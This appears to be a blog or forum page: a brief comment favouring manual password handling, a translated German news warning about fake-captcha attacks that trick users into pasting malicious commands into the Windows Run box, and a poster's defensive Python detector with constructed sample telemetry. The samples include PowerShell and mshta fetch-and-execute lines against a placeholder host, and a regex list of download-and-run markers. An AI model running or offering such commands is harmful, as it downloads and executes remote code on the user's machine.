Blog Post
I agree that strong, unique passwords are essential for security. Saving passwords can be safe, but I personally prefer to keep everything compartmentalized. This means that if one account is compromised, there's no way for an attacker to use that information to access my other accounts.
This is exactly why I think using a password manager is a bad idea. Even if it's well-protected and encrypted, there's always a risk of it being compromised. If that happens, all stored passwords could potentially be exposed at once. Keeping passwords separate and managing them manually reduces the impact of a single breach.
I wish I could find my old article on phishing so I could contribute more to the discussion, but it seems to be lost in one of the older security newsletters.
Keep up the great work!
Hey all, I've got some news for you out of Germany. I translated the news article into English; there might be some minor mistakes, but I'm sure you'll all get the meaning:
Checkbox as bait: You're not a robot? Malware could be lurking behind captchas.
Everyone is familiar with checkboxes or image challenges used to prove that you're a human and not a machine. This gives so-called captchas a certain level of trust. Cybercriminals exploit this mercilessly.
Anyone who currently encounters "I am not a robot" captchas when opening websites should be especially cautious after clicking the green confirmation checkbox. If access to the site is granted as normal after checking the box, everything is fine.
However, if another banner appears after the checkbox prompt with instructions to execute keyboard shortcuts, you've landed on a highly dangerous, manipulated website that intends to plant malware on your computer. The Federal Office for Information Security (BSI) is currently warning against this again. In this case, abort immediately and close your browser.
If captchas require key combinations, something is wrong.
The attack method first appeared at the end of 2024 and was documented by the Swiss Federal Office for Cyber Security (BACS). That the initial prompt was already a fake captcha becomes clear when a second banner appears, demanding that various key combinations be executed for an alleged further verification step.
The perfidious attack explained in detail:
- By checking the "I am not a robot" captcha box, a malicious command has already been copied to the clipboard. Here is what the cybercriminals want unsuspecting users to do next:
- In the second banner, they are prompted to open a Windows input field using a keyboard shortcut.
- Using another keyboard shortcut, they are then supposed to paste the dangerous command from the clipboard into the input field and execute it.
- Malware is then downloaded and installed from an attacker's server, with devastating capabilities, such as:
  - collecting information, for example from the operating system, web browsers, or messengers;
  - stealing sensitive login or payment information, such as passwords or credit card details;
  - attacking crypto wallets or authentication processes, such as those for online banking;
  - executing any other commands;
  - injecting any other malware.
Since many malware programs make profound changes to the system that cannot easily be reversed, victims should restart their entire computer as a precaution after an actual infection with the malware from the captcha attack, advises the BACS.
After an infection, victims must take action. In detail, this means:
Reinstall the operating system completely and, if possible, restore the data from backups on external storage devices. If there is no backup, or no up-to-date backup, on external storage devices (something no user should be without), the data must of course be backed up before reinstalling the computer. Additionally, as a precaution, all online account passwords should be changed, especially those for email accounts.
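The article describes the chain from the victim's side: a command lands on the clipboard, the Run box is opened with a shortcut, the command is pasted and executed. For anyone doing detection or incident response on the defender's side, here is an added example (my own sketch, not code from the article, the BSI or the BACS) of what that chain looks like in Windows telemetry and how to flag it. It assumes two real Windows data sources: process-creation records with parent image, image and command line (Sysmon event ID 1 or Security event 4688 style), and the Run dialog's history, which Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as "command\1" strings. The sample events, the hostname example.invalid and the marker list are constructed for the demo; real rules would be tuned to your environment.

```python
import re
from dataclasses import dataclass

# Interpreters and LOLBins typically typed into the Run box in this attack class.
LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
             "wscript.exe", "cscript.exe"}

# Command-line fragments that indicate fetch-and-execute behaviour. Each match
# adds one point; a bare URL alone scores 1 and is not flagged (see threshold).
SUSPICIOUS = [
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
    re.compile(r"https?://[^\s\"']+", re.I),
]

@dataclass
class ProcessEvent:
    """Minimal view of a process-creation record (Sysmon EID 1 / Security 4688)."""
    parent_image: str
    image: str
    command_line: str

def score_command(cmd: str) -> int:
    """Number of distinct suspicious markers present in a command line."""
    return sum(1 for pat in SUSPICIOUS if pat.search(cmd))

def is_clickfix_like(ev: ProcessEvent, threshold: int = 2) -> bool:
    """Flag an interpreter started directly by explorer.exe (how a Run-box
    launch shows up) whose command line carries several fetch/execute markers."""
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    image = ev.image.rsplit("\\", 1)[-1].lower()
    if parent != "explorer.exe" or image not in LAUNCHERS:
        return False
    return score_command(ev.command_line) >= threshold

def flag_runmru(values: dict, threshold: int = 2) -> list:
    """RunMRU keeps each Run-box history entry as 'command\\1'; 'MRUList' only
    orders them. Return the raw commands that look like this attack, so an
    analyst can confirm what was pasted even if process telemetry is gone."""
    hits = []
    for name, val in values.items():
        if name == "MRUList":
            continue
        cmd = val[:-2] if val.endswith("\\1") else val
        if score_command(cmd) >= threshold:
            hits.append(cmd)
    return hits

# Constructed sample telemetry for the demo; not real captures.
PASTED = 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PASTED),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 r"notepad.exe C:\Users\alice\todo.txt"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -File build.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c ipconfig /all"),
]
SAMPLE_RUNMRU = {
    "a": PASTED + "\\1",
    "b": "calc\\1",
    "c": "mshta https://example.invalid/v.hta\\1",
    "MRUList": "cba",
}

def run_demo():
    """Return (flagged process command lines, flagged RunMRU commands)."""
    procs = [ev.command_line for ev in SAMPLE_EVENTS if is_clickfix_like(ev)]
    return procs, flag_runmru(SAMPLE_RUNMRU)

if __name__ == "__main__":
    procs, mru = run_demo()
    print("suspicious Run-box launches:", procs)
    print("suspicious RunMRU entries:  ", mru)
```

Two design points. The parent-process check matters more than the keyword list: the article's whole trick is that the user, not a dropper, launches the interpreter, so the telltale sign is explorer.exe spawning PowerShell or mshta with a download-and-run command line, which is rare for legitimate use. The RunMRU check is the forensic counterpart for the reinstall decision the article recommends: if the pasted command is still in the Run history after the event logs have rolled over, you can recover the URL the malware came from. As an extra preventive measure that the article does not mention, the Windows "Remove Run menu from Start Menu" policy (the NoRun registry value under the Explorer policies key) disables the Run box and Win+R for users who have no need for it, which removes the second step of the chain entirely.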